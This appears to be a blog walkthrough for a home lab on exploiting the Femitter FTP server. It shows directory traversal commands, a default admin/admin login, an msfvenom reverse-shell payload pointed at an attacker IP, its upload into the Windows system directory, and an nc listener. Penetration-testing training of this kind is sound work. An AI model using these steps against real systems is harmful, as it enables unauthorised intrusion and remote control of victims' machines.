Every ethical hacker finds a recurring feeling of brief confusion when discovering a new vulnerable service is running, followed by a lasting relief upon finding a working exploit.
- How to Ace Your Junior Penetration Tester Interview and Land the Job
- Another PowerView Tutorial: How To Use PowerView In A Penetration Test
- The HackMyVM Keys Walkthrough
- OSCP Prep: M87 Vulnhub Walkthrough
- The Hacker Kid Vulnhub Walkthrough
Femitter FTP server turned out to be one of those moments for me, I had never heard of it and yet it would soon be under my control to manipulate the victim machine as a result, a byproduct of the software’s faulty programming.
This is how to exploit Femitter FTP: a Kali Linux walkthrough.
Table of Contents
Here’s What You Need
- Windows Client (VirtualBox)
- Kali Linux (VirtualBox)
- Femitter FTP/HTTP Server from the site.
Downloading and running the Femitter installer on the Windows client, we open the new program and start the HTTP/FTP servers.
Why It’s Vulnerable
Femitter allows anonymous users to authenticate by default. It also is vulnerable to file traversal.
# list the files on the Windows client (Program Files)
ftp> ls ../../../../Progra~1
200 Port command successful.
150 Opening data connection for directory list.
dr--r--r-- 1 ftp ftp 0 Jun 29 19:34 Program Files
226 File sent okNow watch closely as I am able to put a test file in the Windows client’s /windows/system32 directory.
# upload file to victim's protected directory
ftp> put test.txt ../../../../windows/system32/test.txt
local: test.txt remote: ../../../../windows/system32/test.txt
200 Port command successful.
150 Opening data connection for ../../../../windows/system32/test.txt.
226 File received ok
5 bytes sent in 0.00 secs (82.7595 kB/s)Set Up Femitter FTP Server
Running the Femitter application needs a manual start by default, the automatic option is a possible configuration. I choose to start the server manually to be sure it is on, but you can choose to do either. As long as the software is running so we can attack and destroy.
Run an Nmap Scan
By running a network mapper (yea I know) scripting engine script .nse (use locate *.nse to find the system files) I see the results of the brute forced authentication accounts on the remote FTP server.
Let’s connect using one of the many authorized user accounts.
# connect and get ready to destroy
ftp 10.0.2.10
Connected to 10.0.2.10.
220 Femitter FTP Server ready.
Name (10.0.2.10:root): admin
331 Password required for admin.
Password: admin
230 User admin logged in.
Remote system type is UNIX.
Using binary mode to transfer files.How to Exploit Fermitter
Exploiting the vulnverable software can be done manually by creating an msfvenom reverse shell (meterpreter or windows/shell_reverse_tcp *don’t use meterpreter if you can help it). I prefer to use the exploit found in a Python script.
The exploit creates an msfvenom payload and names it zzzzz.exe. It then uploads the executable via the directory traversal vulnerability in one of the most protected directory locations on the Windows victim.
How to Exploit Manually
First you have to make the payload.
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.101 LPORT=1234 -f exe -o payload_femitter.exeThen upload the payload after connecting to the FTP server on the Windows client.
ftp 192.168.56.103
cd ..
put payload_femitter.exeNow to call the payload and receive a shell using nectar.
nc -lvp 1234And that’s it, the payload was uploaded and a shell was received by using a netcat listener. From this point any number of things can be done to escalate privileges. Don’t know what to do next? See the Best Pentesting Cheatsheet for Ethical Hackers.